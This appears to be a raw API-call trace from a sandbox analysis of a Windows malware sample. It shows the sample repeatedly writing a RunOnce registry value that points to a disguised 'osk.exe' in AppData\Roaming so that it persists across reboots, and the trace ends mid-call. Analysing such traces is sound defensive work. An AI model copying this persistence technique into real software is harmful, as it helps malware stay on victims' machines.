[0095.994] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.008] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.008] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.008] KillTimer (hWnd=0x20280, uIDEvent=0x227d) returned 1 [0096.008] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.009] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.009] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.009] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.009] RegCloseKey (hKey=0x280) returned 0x0 [0096.009] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.010] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.010] SetTimer (hWnd=0x20280, nIDEvent=0x227e, uElapse=0xa, lpTimerFunc=0x0) returned 0x227e [0096.010] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.023] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.023] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.024] KillTimer (hWnd=0x20280, uIDEvent=0x227e) returned 1 [0096.024] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.024] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.024] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: 
phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.025] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.025] RegCloseKey (hKey=0x280) returned 0x0 [0096.025] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.025] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.025] SetTimer (hWnd=0x20280, nIDEvent=0x227f, uElapse=0xa, lpTimerFunc=0x0) returned 0x227f [0096.025] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.041] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.041] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.041] KillTimer (hWnd=0x20280, uIDEvent=0x227f) returned 1 [0096.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.042] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.042] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.042] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.042] RegCloseKey (hKey=0x280) returned 0x0 [0096.042] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.042] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.043] SetTimer (hWnd=0x20280, nIDEvent=0x2280, uElapse=0xa, lpTimerFunc=0x0) returned 0x2280 [0096.043] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: 
lpMsg=0x33f7fc) returned 1 [0096.055] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.055] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.055] KillTimer (hWnd=0x20280, uIDEvent=0x2280) returned 1 [0096.055] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.056] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.056] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.056] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.056] RegCloseKey (hKey=0x280) returned 0x0 [0096.056] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.056] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.056] SetTimer (hWnd=0x20280, nIDEvent=0x2281, uElapse=0xa, lpTimerFunc=0x0) returned 0x2281 [0096.056] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.070] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.070] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.071] KillTimer (hWnd=0x20280, uIDEvent=0x2281) returned 1 [0096.071] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.071] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.072] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.072] RegSetValueExA (in: 
hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.072] RegCloseKey (hKey=0x280) returned 0x0 [0096.072] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.072] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.072] SetTimer (hWnd=0x20280, nIDEvent=0x2282, uElapse=0xa, lpTimerFunc=0x0) returned 0x2282 [0096.073] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.086] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.086] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.086] KillTimer (hWnd=0x20280, uIDEvent=0x2282) returned 1 [0096.087] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.087] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.087] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.088] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.088] RegCloseKey (hKey=0x280) returned 0x0 [0096.088] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.088] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.088] SetTimer (hWnd=0x20280, nIDEvent=0x2283, uElapse=0xa, lpTimerFunc=0x0) returned 0x2283 [0096.088] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.102] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.102] 
DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.102] KillTimer (hWnd=0x20280, uIDEvent=0x2283) returned 1 [0096.102] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.102] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.103] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.103] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.103] RegCloseKey (hKey=0x280) returned 0x0 [0096.103] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.103] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.103] SetTimer (hWnd=0x20280, nIDEvent=0x2284, uElapse=0xa, lpTimerFunc=0x0) returned 0x2284 [0096.104] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.117] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.117] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.117] KillTimer (hWnd=0x20280, uIDEvent=0x2284) returned 1 [0096.118] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.118] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.118] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.119] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.119] RegCloseKey (hKey=0x280) returned 0x0 [0096.119] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.119] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.119] SetTimer (hWnd=0x20280, nIDEvent=0x2285, uElapse=0xa, lpTimerFunc=0x0) returned 0x2285 [0096.119] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.133] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.133] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.133] KillTimer (hWnd=0x20280, uIDEvent=0x2285) returned 1 [0096.133] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.134] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.134] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.134] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.134] RegCloseKey (hKey=0x280) returned 0x0 [0096.134] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.135] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.135] SetTimer (hWnd=0x20280, nIDEvent=0x2286, uElapse=0xa, lpTimerFunc=0x0) returned 0x2286 [0096.135] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.148] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.148] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.149] KillTimer (hWnd=0x20280, 
uIDEvent=0x2286) returned 1 [0096.149] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.149] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.149] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.150] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.150] RegCloseKey (hKey=0x280) returned 0x0 [0096.150] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.150] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.150] SetTimer (hWnd=0x20280, nIDEvent=0x2287, uElapse=0xa, lpTimerFunc=0x0) returned 0x2287 [0096.150] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.164] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.164] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.164] KillTimer (hWnd=0x20280, uIDEvent=0x2287) returned 1 [0096.165] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.165] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.165] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.165] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.166] RegCloseKey (hKey=0x280) returned 0x0 [0096.166] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.166] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.166] SetTimer (hWnd=0x20280, nIDEvent=0x2288, uElapse=0xa, lpTimerFunc=0x0) returned 0x2288 [0096.166] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.180] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.180] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.180] KillTimer (hWnd=0x20280, uIDEvent=0x2288) returned 1 [0096.180] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.181] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.181] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.181] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.181] RegCloseKey (hKey=0x280) returned 0x0 [0096.182] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.182] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.182] SetTimer (hWnd=0x20280, nIDEvent=0x2289, uElapse=0xa, lpTimerFunc=0x0) returned 0x2289 [0096.182] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.195] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.195] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.195] KillTimer (hWnd=0x20280, uIDEvent=0x2289) returned 1 [0096.196] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 
[0096.196] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.196] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.197] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.197] RegCloseKey (hKey=0x280) returned 0x0 [0096.197] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.197] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.197] SetTimer (hWnd=0x20280, nIDEvent=0x228a, uElapse=0xa, lpTimerFunc=0x0) returned 0x228a [0096.197] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.211] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.211] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.211] KillTimer (hWnd=0x20280, uIDEvent=0x228a) returned 1 [0096.211] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.211] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.211] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.212] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.212] RegCloseKey (hKey=0x280) returned 0x0 
[0096.212] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.212] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.212] SetTimer (hWnd=0x20280, nIDEvent=0x228b, uElapse=0xa, lpTimerFunc=0x0) returned 0x228b [0096.212] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.226] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.226] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.226] KillTimer (hWnd=0x20280, uIDEvent=0x228b) returned 1 [0096.227] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.227] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.227] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.227] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.228] RegCloseKey (hKey=0x280) returned 0x0 [0096.228] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.228] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.228] SetTimer (hWnd=0x20280, nIDEvent=0x228c, uElapse=0xa, lpTimerFunc=0x0) returned 0x228c [0096.228] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.242] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.242] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.242] KillTimer (hWnd=0x20280, uIDEvent=0x228c) returned 1 [0096.242] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.242] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.243] 
RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.243] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.243] RegCloseKey (hKey=0x280) returned 0x0 [0096.243] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.243] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.243] SetTimer (hWnd=0x20280, nIDEvent=0x228d, uElapse=0xa, lpTimerFunc=0x0) returned 0x228d [0096.243] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.257] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.257] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.258] KillTimer (hWnd=0x20280, uIDEvent=0x228d) returned 1 [0096.258] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.258] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.258] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.259] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.259] RegCloseKey (hKey=0x280) returned 0x0 [0096.259] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.259] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.259] SetTimer (hWnd=0x20280, nIDEvent=0x228e, uElapse=0xa, lpTimerFunc=0x0) returned 0x228e [0096.259] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.273] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.273] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.273] KillTimer (hWnd=0x20280, uIDEvent=0x228e) returned 1 [0096.274] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.274] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.274] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0096.274] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0096.275] RegCloseKey (hKey=0x280) returned 0x0 [0096.275] IUnknown:Release (This=0x7a9740) returned 0x1 [0096.275] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.275] SetTimer (hWnd=0x20280, nIDEvent=0x228f, uElapse=0xa, lpTimerFunc=0x0) returned 0x228f [0096.275] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0096.289] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0096.289] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0096.289] KillTimer (hWnd=0x20280, uIDEvent=0x228f) returned 1 [0096.289] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0096.290] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0096.290] RegCreateKeyExA (in: hKey=0x80000001, 
